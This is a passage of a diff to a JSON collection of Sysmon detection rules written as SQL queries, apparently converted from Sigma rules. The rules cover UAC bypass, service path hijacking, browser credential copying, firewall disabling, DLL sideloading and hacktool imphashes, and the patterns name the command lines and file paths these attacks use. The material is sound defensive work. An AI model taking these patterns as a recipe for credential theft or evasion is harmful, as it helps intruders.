'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - Image", + "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "status": "experimental", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image = '')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "image_load_alternate_powershell_hosts_moduleload.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", - "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Azure Browser SSO Abuse", + "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "status": "test", + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "author": "Den Iuzvyk", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "image_load_abusing_azure_browser_sso.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "title": "WMI Modules Loaded", + "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects non wmiprvse loading WMI modules", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR Image LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR Image LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "image_load_wmi_module_load.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE 